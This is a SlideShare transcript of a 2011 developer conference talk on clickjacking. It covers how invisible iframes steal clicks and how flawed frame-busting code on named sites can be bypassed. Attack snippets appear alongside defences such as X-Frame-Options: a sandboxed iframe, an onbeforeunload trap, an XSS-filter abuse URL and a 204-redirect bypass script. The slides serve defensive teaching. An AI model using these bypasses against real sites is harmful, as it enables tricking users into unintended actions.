Developer Conference 2011<br />MICROSOFT USER GROUP HYDERABAD<br />
It is this easy to steal your click!<br />(Secure Web Development)<br />Krishna Chaitanya T<br />Security & Privacy Resear...
Agenda!<br />Saw these on Facebook?<br />Your genuine web page can be victim as well! Lets secure!!<br />
Clickjacking<br />Discovered in 2008-Robert Hansen, Jeremiah Grossman<br />Forces a victim to unintentionally click on inv...
The mischievous <iFrame> tag<br />A web page can embed another web page via iframe<br /><iframesrc="http://bing.com"></ifr...
Clickjacking using CSS & JS<br />demo <br />
Frame Busting!<br />Techniques for preventing your site from being framed<br />Common frame busting code:<br />if (top != ...
Survey<br />Acknowledgement:All survey content from Stanford Web Security Research Lab<br />
What’s wrong?<br />Walmart.com <br />if (top.location != location) {<br />  if(document.referrer &&<br />document.referrer...
Error in Referrer checking. Attacker URL can be: http://usbank.attacker.com
‘parent’ refers to the window available one level higher. So Double framing will break this.</li></li></ul><li>Busting Fra...
Prevents XSS
Prevents Defacement
Facilitates clickjacking!</li></ul>onBeforeUnloadEvent<br /><h1>www.attacker.com</h1><br /><script><br />window.onbeforeun...
What about their mobile versions?</li></li></ul><li>Is there any hope? <br />
X-Frame-Options<br />The savior! Innovative idea introduced by Microsoft in IE8<br />HTTP header sent on response.<br />Po...
Best JS solution<br /><style>html { visibility: hidden }</style><br /><script><br />if (self == top) {<br />document.docum...
Frame Busting (X - Frame - Options & JavaScript solutions)<br />demo <br />
Upcoming SlideShare
Loading in...5
×

Clickjacking DevCon2011

3,425

Published on

Published in: Technology, Design
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,425
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
99
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Clickjacking DevCon2011

  1. 1. Developer Conference 2011<br />MICROSOFT USER GROUP HYDERABAD<br />
  2. 2. It is this easy to steal your click!<br />(Secure Web Development)<br />Krishna Chaitanya T<br />Security & Privacy Research Lab, Infosys Labs<br />Microsoft MVP - Internet Explorer<br />http://novogeek.com | @novogeek<br />
  3. 3. Agenda!<br />Saw these on Facebook?<br />Your genuine web page can be victim as well! Lets secure!!<br />
  4. 4. Clickjacking<br />Discovered in 2008-Robert Hansen, Jeremiah Grossman<br />Forces a victim to unintentionally click on invisible page<br />Made possible by overlaying transparent layers<br />Basic clickjacking: <br />Positioning via CSS (JS not required!) <br />Follow mouse cursor via JS<br />Advanced techniques:<br />Clickjacking + XSS<br />Clickjacking + CSRF<br />Clickjacking + HTML5 Drag/Drop API<br />
  5. 5. The mischievous <iFrame> tag<br />A web page can embed another web page via iframe<br /><iframesrc="http://bing.com"></iframe><br />CSS opacity attribute: 1 = visible, 0 = invisible<br />
  6. 6. Clickjacking using CSS & JS<br />demo <br />
  7. 7. Frame Busting!<br />Techniques for preventing your site from being framed<br />Common frame busting code:<br />if (top != self) { //condition<br />top.location = self.location; //counter action<br />}<br />
  8. 8. Survey<br />Acknowledgement:All survey content from Stanford Web Security Research Lab<br />
  9. 9. What’s wrong?<br />Walmart.com <br />if (top.location != location) {<br /> if(document.referrer &&<br />document.referrer.indexOf("walmart.com") == -1)<br /> { top.location.replace(document.location.href); } }<br />USBank.com<br />if (self != top) {<br />var domain = getDomain(document.referrer);<br />varokDomains = /usbank|localhost|usbnet/;<br />domain.search(okDomains);if (matchDomain == -1) {<br /> /* frame bust */ } }<br />Many<br />if(top.location != self.location) {<br />parent.location= self.location;<br /> }<br /><ul><li>Error in Referrer checking. Attacker URL can be: http://www.attacker.com/walmart.com.html
  10. 10. Error in Referrer checking. Attacker URL can be: http://usbank.attacker.com
  11. 11. ‘parent’ refers to the window available one level higher. So Double framing will break this.</li></li></ul><li>Busting Frame busting!<br />HTML5 Sandbox<br /><iframe sandbox src=“http://www.victim.com”><br /><ul><li>JavaScript is disabled!
  12. 12. Prevents XSS
  13. 13. Prevents Defacement
  14. 14. Facilitates clickjacking!</li></ul>onBeforeUnloadEvent<br /><h1>www.attacker.com</h1><br /><script><br />window.onbeforeunload = function() {<br /> return "Do you want to leave your favorite site?";<br />}<br /></script><br /><iframesrc="http://www.paypal.com"><br />XSS Filters<br /><ul><li>XSS filters in browsers block this iframe!</li></ul><iframesrc="http://www.example.org/?xyz=%3Cscript%20type=%22text/javascript%22%3<br />Eif"></iframe><br />204-HTTP header<br />varprevent_bust = 0<br />window.onbeforeunload = function() {kill_bust++ }<br />setInterval(function() {<br /> if (kill_bust > 0) {<br />kill_bust -= 2;<br />window.top.location = 'http://no-content-204.com'<br /> }<br />}, 1);<br /><iframesrc="http://www.victim.com"><br />Mobile sites<br /><ul><li>Non mobile sites do frame busting
  15. 15. What about their mobile versions?</li></li></ul><li>Is there any hope? <br />
  16. 16. X-Frame-Options<br />The savior! Innovative idea introduced by Microsoft in IE8<br />HTTP header sent on response.<br />Possible values- “DENY” and “SAMEORIGIN”<br />Implemented by most of the modern browsers<br />Need not depend on JavaScript!<br />Ex: Response.AddHeader("X-Frame-Options", "DENY");<br />Limitations:<br />Poor adoption by sites (Coz of developer ignorance!)<br />No whitelisting – Either block all, or allow all.<br />Nevertheless, advantages outweigh disadvantages.<br />Content Security Policy (CSP) introduced by Mozilla<br />
  17. 17. Best JS solution<br /><style>html { visibility: hidden }</style><br /><script><br />if (self == top) {<br />document.documentElement.style.visibility = 'visible';<br />} else {<br />top.location = self.location; <br />}<br /></script><br />
  18. 18. Frame Busting (X - Frame - Options & JavaScript solutions)<br />demo <br />
  19. 19. Its your turn now!<br />Are your sites clickjacking proof?<br />Think about a one-click approval button being clickjacked!<br />Go back and add X-Frame-Options header to your web projects at office (and earn goodwill of your boss )<br />If you are on old browsers, have JS protection in place<br />If a link on Facebook opens a new window, be highly cautious and avoid clicking. Inquisitive? Check for hidden <iframe> ;)<br />Check your social apps and revoke access if not used.<br />We learnt to break things to build better things. Ethics plz!<br />
  20. 20. References<br />“Busting frame busting: a study of clickjacking vulnerabilities at popular sites” – Research paper by Stanford Web Security researchers.<br />Birth of a Security Feature: ClickJackingDefense-IE Blog<br />IE8 Security part VII – Clickjacking Defenses – IE Blog<br />
  21. 21. I’m Done!<br />Blog: novogeek.com <br />Twitter: @novogeek<br />
  22. 22. Sponsors<br />
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×